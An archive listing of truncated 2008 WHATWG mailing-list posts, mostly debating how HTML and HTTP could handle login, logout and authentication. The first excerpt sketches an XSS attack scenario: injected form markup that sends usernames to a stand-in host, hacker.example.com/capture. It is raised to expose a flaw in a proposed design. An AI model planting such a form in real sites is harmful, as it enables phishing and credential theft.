Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Martin Atkins
Ian Hickson wrote: On Wed, 26 Nov 2008, Philip Taylor wrote: If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying a href=/restricted-access.php?xsshole=form action=http://hacker.example.com/capture name=logininput name=usernameinput

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Julian Reschke
Martin Atkins wrote: ... I may be forgetting missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme: ... I concede that once you generalize it in this way it becomes even less relevant

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Thomas Broyer
On Wed, Nov 26, 2008 at 10:38 PM, Ian Hickson wrote: Ok let me rephrase. What are the user agent requirements for processing the realm value? For other schemes, it's basically show the realm to the user as a hint as to what password is wanted. The realm is (should be) part of the key used by

Re: [whatwg] Feeedback on dfn, abbr, and other elements

2008-11-27 Thread Pentasis
From: Ian Hickson [EMAIL PROTECTED] Subject: Re: [whatwg] Feeedback on dfn, abbr, and other elements related to cross-references To: Calogero Alex Baldacchino [EMAIL PROTECTED] Cc: WHAT Working Group whatwg@lists.whatwg.org Message-ID: [EMAIL PROTECTED] Content-Type: TEXT/PLAIN; charset=US-ASCII

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Thomas Broyer
On Wed, Nov 26, 2008 at 11:40 PM, Martin Atkins wrote: Julian Reschke wrote: You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. According to section 14.8

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Julian Reschke
Thomas Broyer wrote: ... Julian is saying that if your page varies depending on the user being authenticated and/or the client not being authenticated at all, you (the origin server) should include a Vary: Authorization. This means that if a shared cache has cached the response to an

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Thomas Broyer
On Thu, Nov 27, 2008 at 1:41 PM, Julian Reschke wrote: Thomas Broyer wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely?

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Julian Reschke
Thomas Broyer wrote: I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web sites (including most if not all e-commerce web sites) are facing, and

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Elliotte Harold
Henri Sivonen wrote: That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. I suspect this will require far more of the bot than merely parsing HTML. Many login

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Thomas Broyer
On Thu, Nov 27, 2008 at 5:56 PM, Julian Reschke wrote: Thomas Broyer wrote: I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web sites

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Elliotte Harold
Asbjørn Ulsberg wrote: [Response 1] HTTP/1.1 401 Unauthorized WWW-Authenticate: HTML realm=Administration <!DOCTYPE html> <html> <form action=/login> <input name=username> <input type=password name=password> <input type=submit> </form> </html> Interesting. If we go down

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Elliotte Harold
Julian Reschke wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely? I'm not sure this is what the OP meant, but I'd

Re: [whatwg] Solving the login/logout problem in HTML

2008-11-27 Thread Asbjørn Ulsberg
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL PROTECTED] wrote: Martin Atkins wrote: Your auth token here seems to me to be equivalent to a session cookie. Yes, it does. But since session cookies are just that: cookies -- it isn't. An authentication token is

Re: [whatwg] Feeedback on dfn, abbr, and other elements

2008-11-27 Thread Ian Hickson
On Thu, 27 Nov 2008, Pentasis wrote: Actually, it would solve a problem like this: What if I style abbr so that the title attribute is shown after the abbreviation: abbr[title]:after { content: (attr(title)); } Now obviously I don't need and don't want to do this for every

Re: [whatwg] getElementsByClassName() feedback

2008-11-27 Thread Anne van Kesteren
On Thu, 27 Nov 2008 22:38:32 +0100, Garrett Smith [EMAIL PROTECTED] wrote: It is often desirable to capture events on bubble and interrogate the EventTarget using a hasClassName function to see if it has a className that the program is concerned with. [...] HTML5 already has the

Re: [whatwg] Fallback styles for legacy user agents [was: Re: Deprecating small , b ?]

2008-11-27 Thread Benjamin Hawkes-Lewis
Calogero Alex Baldacchino wrote: That worked fine on Opera 9 and FF2, but, when tried on IE7, the show became a little weird... the element was there, the style attribute was regarded as for any other element (display:block worked), but didn't apply to any of its descendants, as if they